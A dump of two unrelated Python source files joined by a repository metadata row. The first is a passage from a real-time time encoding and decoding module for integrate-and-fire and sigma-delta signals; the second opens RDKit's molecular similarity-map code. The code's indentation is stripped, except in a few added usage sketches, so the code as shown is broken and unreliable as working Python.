encoded_data = temp[0]
self.params = temp[1:]
put(encoded_data)
class RealTimeDecoder(SignalProcessor):
"""
Abstract real-time time decoding machine.
This class implements a real-time time decoding machine. It
must be subclassed to use a specific decoding algorithm.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
bw : float
Signal bandwidth (in rad/s).
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Methods
-------
decode(data, ...)
Decode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, bw, N, M, K):
SignalProcessor.__init__(self, dt, bw, N, M, K)
if N <= 1:
raise ValueError('N must exceed 1')
if M <= 0 or M > N/2:
raise ValueError('M must be in the range (0,N/2)')
if K < 1 or K >= N-2*M:
raise ValueError('K must be in the range [1,N-2*M)') # ???
self.dt = dt
self.bw = bw
self.N = N
self.M = M
self.K = K
self.J = N-2*M-K # number of spikes between overlapping blocks
# Needed to adjust sign for compensation principle used in
# decoding algorithm:
self.sgn = 1
# Spike intervals and spike indices:
self.s = []
self.tk = np.array((), np.float)
# Overlap:
self.overlap = np.array((), np.float)
# Number of spike intervals that must be obtainable from the
# queue. For the first block, N+2 spike intervals must be
# retrieved because the last spike is discarded during the
# reconstruction:
self.intervals_needed = self.N+2
# When these flags are set, the block of data being decoded is
# windowed on its left and right sides as indicated. The
# following initial values are set because the very first
# block does not need to be stitched to any other block:
self.window_left = False
self.window_right = True
if debug:
self.fig = Figure(figsize=debug_plot_figsize)
self.ax = self.fig.add_subplot(111)
self.ax.set_xlabel('t (s)')
self.ax.set_ylabel('y(t)')
self.offset = 0.0
def decode(self, *args):
"""Decode a block of data. This method must be reimplemented
to use a specific decoding algorithm implementation."""
pass
def process(self, get, put):
"""Decode data returned in blocks by function `get()` and
write it to some destination using the function `put()`."""
SignalProcessor.process(self, get, put)
# Set up a buffer to queue input data from the source:
# XXX: the number of initial entries here is arbitrary:
sb = m.SerialBuffer(get, 10*self.N)
while True:
# Get new data to add to the block of encoded data to be
# decoded:
self.intervals_to_add = sb.read(self.intervals_needed)
# If the number of intervals actually obtained is less
# than that requested, then the final block has been
# reached and hence should not be windowed on its right side:
if len(self.intervals_to_add) < self.intervals_needed:
self.window_right = False
# Add the read data to the block to be decoded:
self.s.extend(self.intervals_to_add)
# After the first block, the number of extra spike
# intervals to read during subsequent iterations should be
# equal to J:
if self.intervals_needed != self.J:
self.intervals_needed = self.J
else:
del self.s[0:self.J]
# Find the times of the spikes in the current block:
self.ts = np.cumsum(self.s)
self.tk = np.array(np.round(self.ts/self.dt), int)
self.curr_dur = max(self.ts)
self.t = np.arange(0, self.curr_dur, self.dt)
# Decode the current block:
self.u = self.decode(self.s)
# Discard the portion of the reconstructed signal after
# the second to last spike interval for all blocks except the
# last one:
if self.window_right:
self.n = self.tk[-1]
self.tk = self.tk[0:-1]
self.u = self.u[0:self.n]
self.t = self.t[0:self.n]
# The sign of the spike at the beginning of the next block
# must be the reverse of the current one if J is odd:
if self.J % 2:
self.sgn *= -1
# Construct and apply shaping window to decoded signal:
if self.window_left:
ll = self.ts[self.M]
lr = self.ts[self.M+self.K]
else:
ll = -self.dt # needed to force first entry in window to be 1
lr = 0.0
if self.window_right:
rl = self.ts[self.N-self.M-self.K]
rr = self.ts[self.N-self.M]
else:
rl = self.t[-1]
rr = self.t[-1]
self.w = self.window(self.t, ll, lr, rl, rr)
self.uw = self.u*self.w
if debug:
self.ax.plot(self.offset+self.t, self.uw)
# Apart from the first block, the saved nonzero
# overlapping portion of the previous block must be
# combined with that of the current block:
if self.window_left:
self.u_out = self.overlap + \
self.uw[self.tk[self.M]:self.tk[self.M+self.K]]
else:
self.u_out = self.uw[0:self.tk[self.M+self.K]]
# Apart from the last block, the nonzero portion of the
# current block that will overlap with the next block must
# be retained for the next iteration:
if self.window_right:
self.u_out = np.hstack((self.u_out,
self.uw[self.tk[self.M+self.K]:self.tk[self.N-self.M-self.K]]))
self.overlap = \
self.uw[self.tk[self.N-self.M-self.K]:self.tk[self.N-self.M]]
if debug:
self.offset += self.t[self.tk[self.J-1]]
else:
self.u_out = np.hstack((self.u_out,
self.uw[self.tk[self.M+self.K]::]))
self.overlap = np.array((), np.float)
if debug:
self.offset += 0
# The first block decoded should only be windowed on its
# right side if at all. Hence, if window_left is false and
# window_right is true, window_left should be set to true
# before the next block is processed so that it is
# windowed on its left side:
if self.window_right and not self.window_left:
self.window_left = True
# Write out the current decoded block:
put(self.u_out)
# If window_left is true and window_right is false, the
# last block has been decoded and processing is complete:
if not self.window_right:
break
def __call__(self, x):
"""Calling a class instance is equivalent to running the
decoder on the specified sequence `x`."""
result = SignalProcessor.__call__(self, x)
if debug:
self.canvas = FigureCanvasAgg(self.fig)
self.canvas.print_figure(debug_plot_filename,
debug_plot_dpi)
return result
# Methods for computing the edges of the windows determined by the
# windows() method:
def _theta1(self, t, l, r):
return np.sin((np.pi/2)*(t-l)/(r-l))**2
def _theta2(self, t, l, r):
return np.cos((np.pi/2)*(t-l)/(r-l))**2
def window(self, t, ll, lr, rl, rr):
"""Return a window defined over the vector of times t that
forms a partition of unity over all time. The function is
equal to 0 when t <= ll or t > rr, theta(t,ll,lr) when ll < t
<= lr, 1 when lr < t <= rl, and 1-theta(t,rl,rr)
when rl < t <= rr."""
w = np.zeros(len(t), np.float)
i1 = np.intersect1d(np.where(ll < t)[0], np.where(t <= lr)[0])
i2 = np.intersect1d(np.where(lr < t)[0], np.where(t <= rl)[0])
i3 = np.intersect1d(np.where(rl < t)[0], np.where(t <= rr)[0])
w[i1] = self._theta1(t[i1], ll, lr)
w[i2] = 1.0
w[i3] = self._theta2(t[i3], rl, rr)
return w
class ASDMRealTimeEncoder(RealTimeEncoder):
"""
Real-time ASDM time encoding machine.
This class implements a real-time time encoding machine that uses
an Asynchronous Sigma-Delta Modulator to encode data.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
b : float
Encoder bias.
d : float
Encoder threshold.
k : float
Encoder integration constant.
dte : float
Sampling resolution assumed by the encoder. This may not exceed
`dt`.
quad_method : {'rect', 'trapz'}
Quadrature method to use (rectangular or trapezoidal).
Methods
-------
encode(data, ...)
Encode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, b, d, k=1.0, dte=0.0, quad_method='trapz'):
# The values 0, 0, and 1 passed to the constructor
# initialize the y, interval, and sgn parameters of the ASDM
# encoder function:
SignalProcessor.__init__(self, dt, b, d, k, dte,
0.0, 0.0, 1, quad_method, True)
def encode(self, data):
"""Encode a block of data with an ASDM encoder."""
return asdm.asdm_encode(data, *self.params)
class ASDMRealTimeDecoder(RealTimeDecoder):
"""
Real-time ASDM time decoding machine.
This class implements a real-time time decoding machine that
decodes data encoded using an Asynchronous Sigma-Delta Modulator.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is 1/dt Hz.
bw : float
Signal bandwidth (in rad/s).
b : float
Encoder bias.
d : float
Decoder threshold.
k : float
Decoder integration constant.
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Methods
-------
decode(data, ...)
Decode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, bw, b, d, k, N, M, K):
RealTimeDecoder.__init__(self, dt, bw, N, M, K)
self.b = b
self.d = d
self.k = k
def decode(self, data):
"""Decode a block of data that was encoded with an ASDM
encoder."""
return vtdm.asdm_decode_vander(data, self.curr_dur, self.dt,
self.bw, self.b, self.d, self.k,
self.sgn)
class ASDMRealTimeDecoderIns(RealTimeDecoder):
"""
Real-time threshold-insensitive ASDM time decoding machine.
This class implements a threshold-insensitive real-time time
decoding machine that decodes data encoded using an Asynchronous
Sigma-Delta Modulator.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
bw : float
Signal bandwidth (in rad/s).
b : float
Encoder bias.
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Methods
-------
decode(data, ...)
Decode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, bw, b, N, M, K):
RealTimeDecoder.__init__(self, dt, bw, N, M, K)
self.b = b
def decode(self, data):
"""Decode a block of data that was encoded with an ASDM
encoder."""
return vtdm.asdm_decode_vander_ins(data, self.curr_dur, self.dt,
self.bw, self.b, self.sgn)
class IAFRealTimeEncoder(RealTimeEncoder):
"""
Real-time IAF neuron time encoding machine.
This class implements a real-time time encoding machine that uses
an Integrate-and-Fire neuron to encode data.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
b : float
Encoder bias.
d : float
Encoder threshold.
R : float
Neuron resistance.
C : float
Neuron capacitance.
dte : float
Sampling resolution assumed by the encoder. This may not exceed
`dt`.
quad_method : {'rect', 'trapz'}
Quadrature method to use (rectangular or trapezoidal).
Methods
-------
encode(data, ...)
Encode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, b, d, R=np.inf, C=1.0, dte=0.0, quad_method='trapz'):
# The values 0 and 0 passed to the constructor initialize the
# y and interval parameters of the IAF encoder function:
SignalProcessor.__init__(self, dt, b, d, R, C, dte,
0.0, 0.0, quad_method, True)
def encode(self, data):
"""Encode a block of data with an IAF neuron."""
return iaf.iaf_encode(data, *self.params)
class IAFRealTimeDecoder(RealTimeDecoder):
"""
Real-time IAF neuron time decoding machine.
This class implements a real-time time decoding machine that
decodes data encoded using an Integrate-and-Fire neuron.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
bw : float
Signal bandwidth (in rad/s).
b : float
Encoder bias.
d : float
Decoder threshold.
R : float
Neuron resistance.
C : float
Neuron capacitance.
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Methods
-------
decode(data, ...)
Decode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, bw, b, d, R, C, N, M, K):
RealTimeDecoder.__init__(self, dt, bw, N, M, K)
self.b = b
self.d = d
self.R = R
self.C = C
def decode(self, data):
"""Decode a block of data that was encoded with an
IAF neuron."""
return vtdm.iaf_decode_vander(data, self.curr_dur, self.dt,
self.bw, self.b, self.d, self.R, self.C)
def iaf_encode(u, dt, b, d, R=np.inf, C=1.0, dte=0, quad_method='trapz'):
"""
Real-time IAF neuron time encoding machine.
Encode a finite length signal with an Integrate-and-Fire neuron.
Parameters
----------
u : array_like of floats
Signal to encode.
dt : float
Sampling resolution of input signal; the sampling frequency
is 1/dt Hz.
b : float
Encoder bias.
d : float
Encoder threshold.
R : float
Neuron resistance.
C : float
Neuron capacitance.
dte : float
Sampling resolution assumed by the encoder (s).
This may not exceed `dt`.
quad_method : {'rect', 'trapz'}
Quadrature method to use (rectangular or trapezoidal) when the
neuron is ideal; exponential Euler integration is used
when the neuron is leaky.
Returns
-------
s : ndarray of floats
Returns the signal encoded as an
array of time intervals between spikes.
Notes
-----
When trapezoidal integration is used, the value of the integral
will not be computed for the very last entry in `u`.
"""
encoder = IAFRealTimeEncoder(dt, b, d, R, C, dte, quad_method)
return np.asarray(encoder(u))
def iaf_decode(s, dt, bw, b, d, R, C, N=10, M=3, K=1):
"""
Real-time IAF neuron time decoding machine.
Decode a finite length signal encoded with an Integrate-and-Fire
neuron.
Parameters
----------
s : ndarray of floats
Encoded signal. The values represent the time between spikes (in s).
dt : float
Sampling resolution of original signal; the sampling frequency
is 1/dt Hz.
bw : float
Signal bandwidth (in rad/s).
b : float
Encoder bias.
d : float
Encoder threshold.
R : float
Neuron resistance.
C : float
Neuron capacitance.
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Returns
-------
u_rec : ndarray of floats
Recovered signal.
"""
decoder = IAFRealTimeDecoder(dt, bw, b, d, R, C, N, M, K)
return np.asarray(decoder(s))
def iaf_encode_delay(u_list, T_block, t_begin, dt,
b_list, d_list, k_list, a_list, w_list):
"""
Real-time multi-input multi-output delayed IAF time encoding machine.
Encode several signals with an ensemble of ideal Integrate-and-Fire
neurons with delays.
Parameters
----------
u_list : list
Signals to encode. Must contain `M` arrays of equal length.
T_block : float
Length of block to encode (in s) during each iteration.
t_begin : float
Time at which to begin encoding (in s).
dt : float
Sampling resolution of input signals; the sampling frequency
is 1/dt Hz.
b_list : list
List of encoder biases. Must be of length `M`.
d_list : list
List of encoder thresholds. Must be of length `M`.
k_list : list
List of encoder integration constants. Must be of length `M`.
a_list : array_like
Array of neuron delays (in s). Must have shape `(N, M)`.
w_list : array_like
Array of scaling factors. Must have shape `(N, M)`.
Returns
-------
s_list : list
List of arrays of interspike intervals.
"""
M = len(u_list)
if not M:
raise ValueError('no spike data given')
if len(set(map(len, u_list))) > 1:
raise ValueError('all input signals must be of the same length')
Nt = len(u_list[0])
N = len(b_list) # number of neurons
# Initialize interspike interval storage lists:
s_list = [[] for i in xrange(N)]
# Initialize integrator and current interspike interval arrays:
interval_list = [0.0 for i in xrange(N)]
y_list = [0.0 for i in xrange(N)]
# Convert times to integer indices to avoid index round-off problems:
if T_block <= t_begin:
raise ValueError('block length must exceed start time')
a_max = np.max(a_list)
T = T_block
t_start = 0.0
t_end = T
K = ne.ifloor((T-t_begin)/dt)
k_start = 0
k_end = ne.ifloor(t_end/dt)
count = 0
while k_start < Nt:
# Convert the bounds of the interval to encode to indices:
print '%i: window: [%f, %f]' % (count, k_start*dt, k_end*dt)
count += 1
# Encode the block:
u_block_list = map(lambda x: x[k_start:k_end], u_list)
s_curr_list, t_begin, dt, b_list, d_list, k_list, a_list, \
w_list, y_list, interval_list, full_output = \
iaf.iaf_encode_delay(u_block_list,
t_begin,
dt, b_list, d_list, k_list,
a_list, w_list,
y_list, interval_list, True)
# Save the encoded data:
for i in xrange(N):
s_list[i].extend(s_curr_list[i])
# Advance k_start and k_end:
k_start += K
k_end += K
# When the end of the signal is reached, the encoding block
# must be shortened:
if k_end > Nt:
k_end = Nt
return map(np.asarray, s_list)
def _theta1(t, l, r):
return np.sin((np.pi/2)*(t-l)/(r-l))**2
def _theta2(t, l, r):
return np.cos((np.pi/2)*(t-l)/(r-l))**2
def _get_spike_block(s_list, t_start, t_end):
"""
Get block of interspike intervals.
If `s_list` contains arrays of interspike intervals, return a list
of subarrays containing those interspike intervals between the
times `t_start` and `t_end`.
Parameters
----------
s_list : list
List of interspike interval arrays.
t_start : float
Starting time of block.
t_end : float
Ending time of block.
Returns
-------
s_block_list : list
List of interspike interval subarrays containing the desired values.
Notes
-----
The first interspike interval in each subarray in the returned
block is adjusted to avoid introducing incorrect shifts between
each spike train.
"""
if t_end <= t_start:
raise ValueError('t_end must exceed t_start')
ts_list = map(np.cumsum, s_list)
s_block_list = []
for i in xrange(len(s_list)):
block_indices = \
np.intersect1d(np.where(ts_list[i] > t_start)[0],
np.where(ts_list[i] <= t_end)[0])
s_block = s_list[i][block_indices].copy()
# Adjust first interspike interval in the block:
s_block[0] = ts_list[i][block_indices[0]]-t_start
s_block_list.append(s_block.copy())
return s_block_list
def iaf_decode_delay(s_list, T_block, T_overlap, dt,
b_list, d_list, k_list, a_list, w_list):
"""
Real-time multi-input multi-output delayed IAF time decoding machine.
Decode several signals encoded with an ensemble of ideal
Integrate-and-Fire neurons with delays.
Parameters
----------
s_list : list of ndarrays of floats
Signals encoded by an ensemble of encoders. The values
represent the time between spikes (in s). The number of arrays
in the list corresponds to the number of encoders in the ensemble.
T_block : float
Length of block to decode during each iteration (in s).
T_overlap : float
Length of overlap between successive blocks (in s).
dt : float
Sampling resolution of input signals; the sampling frequency
is 1/dt Hz.
b_list : list
List of encoder biases. Must be of length `N`.
d_list : list
List of encoder thresholds. Must be of length `N`.
k_list : list
List of encoder integration constants. Must be of length `N`.
a_list : array_like
Array of neuron delays (in s). Must be of shape `(N, M)`.
w_list : array_like
Array of scaling factors. Must be of shape `(N, M)`.
Returns
-------
u_list : list
Decoded signals.
"""
if 2*T_overlap >= T_block:
raise ValueError('overlap cannot exceed half of the block length')
# Stitching the first and last blocks requires special treatment:
first_block = True
last_block = False
# Convert times to integer indices to avoid index round-off problems:
K_block = ne.iround(T_block/dt)
K = K_block
K_overlap = ne.iround(T_overlap/dt)
# How much to shift the decoding window during each iteration:
K_inc = ne.iround((T_block-T_overlap)/dt)
# Decoding window bounds:
k_start = 0
k_end = K
# The portion of the last block that overlaps with the current
# decoded block is stored here:
u_overlap = None
# The decoded blocks are accumulated in a list and concatenated
# when the end of the signal is reached:
u_block_list = []
t_max = np.max(map(np.sum, s_list))
k_max = ne.iround(t_max/dt)
# Don't bother stitching if the encoded signal spans an interval
# of time that is shorter than the block length:
if k_max < K_block:
return iaf.iaf_decode_delay(s_list, K*dt, dt, b_list, d_list,
k_list, a_list, w_list)
count = 0
while k_start < k_max:
# Select block of spike times to decode:
s_block_list = _get_spike_block(s_list, k_start*dt, k_end*dt)
print '%i: window: [%f, %f]' % (count, k_start*dt, k_end*dt)
count += 1
# Decode the block:
u_curr_list = iaf.iaf_decode_delay(s_block_list, K*dt, dt, b_list, d_list,
k_list, a_list, w_list)
# Convert decoded block into a 2D array to make processing easier:
u_curr = np.array(u_curr_list)
# The first block doesn't need to be stitched on its left side:
if first_block:
u_block_list.append(u_curr[:, 0:K_overlap])
else:
# Generate windowing functions needed to taper the overlap
# from the previous iteration and the overlap from the
# current iteration:
win_prev = _theta2(np.arange(K_overlap, dtype=np.float), 0,
K_overlap)
win_curr = _theta1(np.arange(K_overlap, dtype=np.float), 0,
K_overlap)
# Stitch and save the overlapping portion of the block:
u_block_list.append(u_overlap*win_prev+\
u_curr[:, 0:K_overlap]*win_curr)
if last_block:
# Save the rest of the current block and exit:
u_block_list.append(u_curr[:, K_overlap:])
break
else:
# Save the portion of the block that doesn't require stitching:
u_block_list.append(u_curr[:, K_overlap:-K_overlap])
# Retain the overlap on the right side of the decoded
# block for the next iteration:
u_overlap = u_curr[:, -K_overlap:]
# Advance k_start and k_end, allowing for an overlap:
k_start += K_inc
k_end += K_inc
# When the end of the signal is reached, the decoding block
# must be shortened:
if k_end >= k_max:
k_end = k_max
K = k_end-k_start
last_block = True
else:
K = K_block
# Indicate that the first block has been processed:
if first_block:
first_block = False
# Concatenate all of the decoded blocks and return as a list of arrays:
return list(np.hstack(u_block_list))
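# A minimal usage sketch (hypothetical helper, not part of the original API):
# decode spike trains that were produced elsewhere by a delayed IAF encoder
# ensemble. The spike interval arrays in s_list and the encoder parameters
# (b_list, d_list, k_list, a_list, w_list) are placeholders and must match the
# encoder that generated the spikes for the reconstruction to be meaningful.
def _example_iaf_decode_delay(s_list, b_list, d_list, k_list, a_list, w_list):
    dt = 1e-5         # 100 kHz sampling resolution
    T_block = 0.1     # decode the signal in 100 ms blocks
    T_overlap = 0.01  # stitch adjacent blocks over a 10 ms overlap
    return iaf_decode_delay(s_list, T_block, T_overlap, dt,
                            b_list, d_list, k_list, a_list, w_list)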
| bionet/ted.python | bionet/ted/rt.py | Python | bsd-3-clause | 32,939 | ["NEURON"] | 318491809d7a7bcdb9d5028fe7ebdf1e2fa81622b9fcb8e2cfde297a9e95acab |
#
# Copyright (c) 2013, Novartis Institutes for BioMedical Research Inc.
# Copyright (c) 2021, Greg Landrum
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Created by Sereina Riniker, Aug 2013
import copy
import math
try:
from matplotlib import cm
from matplotlib.colors import LinearSegmentedColormap
except ImportError:
cm = None
except RuntimeError:
cm = None
import numpy
from rdkit import Chem
from rdkit import DataStructs
from rdkit import Geometry
from rdkit.Chem import Draw
from rdkit.Chem.Draw import rdMolDraw2D
from rdkit.Chem import rdDepictor
from rdkit.Chem import rdMolDescriptors as rdMD
def GetAtomicWeightsForFingerprint(refMol, probeMol, fpFunction, metric=DataStructs.DiceSimilarity):
"""
Calculates the atomic weights for the probe molecule
based on a fingerprint function and a metric.
Parameters:
refMol -- the reference molecule
probeMol -- the probe molecule
fpFunction -- the fingerprint function
metric -- the similarity metric
Note:
If fpFunction needs additional parameters, use a lambda construct
"""
if hasattr(probeMol, '_fpInfo'):
delattr(probeMol, '_fpInfo')
if hasattr(refMol, '_fpInfo'):
delattr(refMol, '_fpInfo')
refFP = fpFunction(refMol, -1)
probeFP = fpFunction(probeMol, -1)
baseSimilarity = metric(refFP, probeFP)
# loop over atoms
weights = []
for atomId in range(probeMol.GetNumAtoms()):
newFP = fpFunction(probeMol, atomId)
newSimilarity = metric(refFP, newFP)
weights.append(baseSimilarity - newSimilarity)
if hasattr(probeMol, '_fpInfo'):
delattr(probeMol, '_fpInfo')
if hasattr(refMol, '_fpInfo'):
delattr(refMol, '_fpInfo')
return weights
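# Hypothetical usage sketch (the helper name and molecules are illustrative,
# not part of the original module): per-atom weights from a fingerprint
# comparison, using the RDKit-fingerprint helper defined further below and the
# default Dice similarity.
def _exampleAtomicWeightsForFingerprint():
  refMol = Chem.MolFromSmiles('c1ccccc1O')    # phenol as reference
  probeMol = Chem.MolFromSmiles('c1ccccc1N')  # aniline as probe
  return GetAtomicWeightsForFingerprint(
    refMol, probeMol, lambda m, i: GetRDKFingerprint(m, atomId=i))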
def GetAtomicWeightsForModel(probeMol, fpFunction, predictionFunction):
"""
Calculates the atomic weights for the probe molecule based on
a fingerprint function and the prediction function of a ML model.
Parameters:
probeMol -- the probe molecule
fpFunction -- the fingerprint function
predictionFunction -- the prediction function of the ML model
"""
if hasattr(probeMol, '_fpInfo'):
delattr(probeMol, '_fpInfo')
probeFP = fpFunction(probeMol, -1)
baseProba = predictionFunction(probeFP)
# loop over atoms
weights = []
for atomId in range(probeMol.GetNumAtoms()):
newFP = fpFunction(probeMol, atomId)
newProba = predictionFunction(newFP)
weights.append(baseProba - newProba)
if hasattr(probeMol, '_fpInfo'):
delattr(probeMol, '_fpInfo')
return weights
def GetStandardizedWeights(weights):
"""
Normalizes the weights,
such that the absolute maximum weight equals 1.0.
Parameters:
weights -- the list with the atomic weights
"""
tmp = [math.fabs(w) for w in weights]
currentMax = max(tmp)
if currentMax > 0:
return [w / currentMax for w in weights], currentMax
else:
return weights, currentMax
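# Small illustrative sketch (values are made up): standardization rescales the
# weights so that the largest absolute contribution becomes 1.0 and also
# returns the scaling factor.
def _exampleStandardizedWeights():
  rawWeights = [0.05, -0.20, 0.10]
  scaledWeights, maxWeight = GetStandardizedWeights(rawWeights)
  # scaledWeights == [0.25, -1.0, 0.5], maxWeight == 0.2
  return scaledWeights, maxWeight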
def GetSimilarityMapFromWeights(mol, weights, colorMap=None, scale=-1, size=(250, 250), sigma=None,
coordScale=1.5, step=0.01, colors='k', contourLines=10, alpha=0.5,
draw2d=None, **kwargs):
"""
Generates the similarity map for a molecule given the atomic weights.
Parameters:
mol -- the molecule of interest
weights -- the list of atomic weights
colorMap -- the matplotlib color map scheme, default is custom PiWG color map
scale -- the scaling: scale < 0 -> the absolute maximum weight is used as maximum scale
scale = double -> this is the maximum scale
size -- the size of the figure
sigma -- the sigma for the Gaussians
coordScale -- scaling factor for the coordinates
step -- the step for calcAtomGaussian
colors -- color of the contour lines
contourLines -- if integer number N: N contour lines are drawn
if list(numbers): contour lines at these numbers are drawn
alpha -- the alpha blending value for the contour lines
draw2d -- optional rdMolDraw2D drawer; if provided, the map is rendered with it instead of matplotlib
kwargs -- additional arguments for drawing
"""
if mol.GetNumAtoms() < 2:
raise ValueError("too few atoms")
if draw2d is not None:
mol = rdMolDraw2D.PrepareMolForDrawing(mol, addChiralHs=False)
if not mol.GetNumConformers():
rdDepictor.Compute2DCoords(mol)
if sigma is None:
if mol.GetNumBonds() > 0:
bond = mol.GetBondWithIdx(0)
idx1 = bond.GetBeginAtomIdx()
idx2 = bond.GetEndAtomIdx()
sigma = 0.3 * (mol.GetConformer().GetAtomPosition(idx1) -
mol.GetConformer().GetAtomPosition(idx2)).Length()
else:
sigma = 0.3 * (mol.GetConformer().GetAtomPosition(0) -
mol.GetConformer().GetAtomPosition(1)).Length()
sigma = round(sigma, 2)
sigmas = [sigma] * mol.GetNumAtoms()
locs = []
for i in range(mol.GetNumAtoms()):
p = mol.GetConformer().GetAtomPosition(i)
locs.append(Geometry.Point2D(p.x, p.y))
draw2d.ClearDrawing()
ps = Draw.ContourParams()
ps.fillGrid = True
ps.gridResolution = 0.1
ps.extraGridPadding = 0.5
if colorMap is not None:
if cm is not None and isinstance(colorMap, type(cm.Blues)):
# it's a matplotlib colormap:
clrs = [tuple(x) for x in colorMap([0, 0.5, 1])]
else:
clrs = [colorMap[0], colorMap[1], colorMap[2]]
ps.setColourMap(clrs)
Draw.ContourAndDrawGaussians(draw2d, locs, weights, sigmas, nContours=contourLines, params=ps)
draw2d.drawOptions().clearBackground = False
draw2d.DrawMolecule(mol)
return draw2d
fig = Draw.MolToMPL(mol, coordScale=coordScale, size=size, **kwargs)
if sigma is None:
if mol.GetNumBonds() > 0:
bond = mol.GetBondWithIdx(0)
idx1 = bond.GetBeginAtomIdx()
idx2 = bond.GetEndAtomIdx()
sigma = 0.3 * math.sqrt(
sum([(mol._atomPs[idx1][i] - mol._atomPs[idx2][i])**2 for i in range(2)]))
else:
sigma = 0.3 * \
math.sqrt(sum([(mol._atomPs[0][i] - mol._atomPs[1][i])**2 for i in range(2)]))
sigma = round(sigma, 2)
x, y, z = Draw.calcAtomGaussians(mol, sigma, weights=weights, step=step)
# scaling
if scale <= 0.0:
maxScale = max(math.fabs(numpy.min(z)), math.fabs(numpy.max(z)))
else:
maxScale = scale
# coloring
if colorMap is None:
if cm is None:
raise RuntimeError("matplotlib failed to import")
PiYG_cmap = cm.get_cmap('PiYG', 2)
colorMap = LinearSegmentedColormap.from_list(
'PiWG', [PiYG_cmap(0), (1.0, 1.0, 1.0), PiYG_cmap(1)], N=255)
fig.axes[0].imshow(z, cmap=colorMap, interpolation='bilinear', origin='lower',
extent=(0, 1, 0, 1), vmin=-maxScale, vmax=maxScale)
# contour lines
# only draw them when at least one weight is not zero
if len([w for w in weights if w != 0.0]):
contourset = fig.axes[0].contour(x, y, z, contourLines, colors=colors, alpha=alpha, **kwargs)
for j, c in enumerate(contourset.collections):
if contourset.levels[j] == 0.0:
c.set_linewidth(0.0)
elif contourset.levels[j] < 0:
c.set_dashes([(0, (3.0, 3.0))])
fig.axes[0].set_axis_off()
return fig
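# Hedged sketch of the draw2d branch above (helper name and canvas size are
# illustrative): render a weight map with a Cairo drawer instead of matplotlib.
# The weights would normally come from one of the GetAtomicWeights* helpers.
def _exampleSimilarityMapFromWeights(mol, weights):
  drawer = rdMolDraw2D.MolDraw2DCairo(400, 400)
  GetSimilarityMapFromWeights(mol, weights, draw2d=drawer)
  drawer.FinishDrawing()
  return drawer.GetDrawingText()  # PNG bytes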
def GetSimilarityMapForFingerprint(refMol, probeMol, fpFunction, metric=DataStructs.DiceSimilarity,
**kwargs):
"""
Generates the similarity map for a given reference and probe molecule,
fingerprint function and similarity metric.
Parameters:
refMol -- the reference molecule
probeMol -- the probe molecule
fpFunction -- the fingerprint function
metric -- the similarity metric.
kwargs -- additional arguments for drawing
"""
weights = GetAtomicWeightsForFingerprint(refMol, probeMol, fpFunction, metric)
weights, maxWeight = GetStandardizedWeights(weights)
fig = GetSimilarityMapFromWeights(probeMol, weights, **kwargs)
return fig, maxWeight
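# Hypothetical end-to-end sketch (molecules are arbitrary examples): a Morgan
# fingerprint passed in through a lambda, as suggested in the docstrings above.
# This goes through the matplotlib path, so matplotlib must be available.
def _exampleSimilarityMapForFingerprint():
  refMol = Chem.MolFromSmiles('CCOC(=O)c1ccccc1')    # ethyl benzoate
  probeMol = Chem.MolFromSmiles('CCOC(=O)c1ccccn1')  # pyridine analogue
  fig, maxWeight = GetSimilarityMapForFingerprint(
    refMol, probeMol,
    lambda m, i: GetMorganFingerprint(m, atomId=i, radius=2, fpType='bv'))
  return fig, maxWeight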
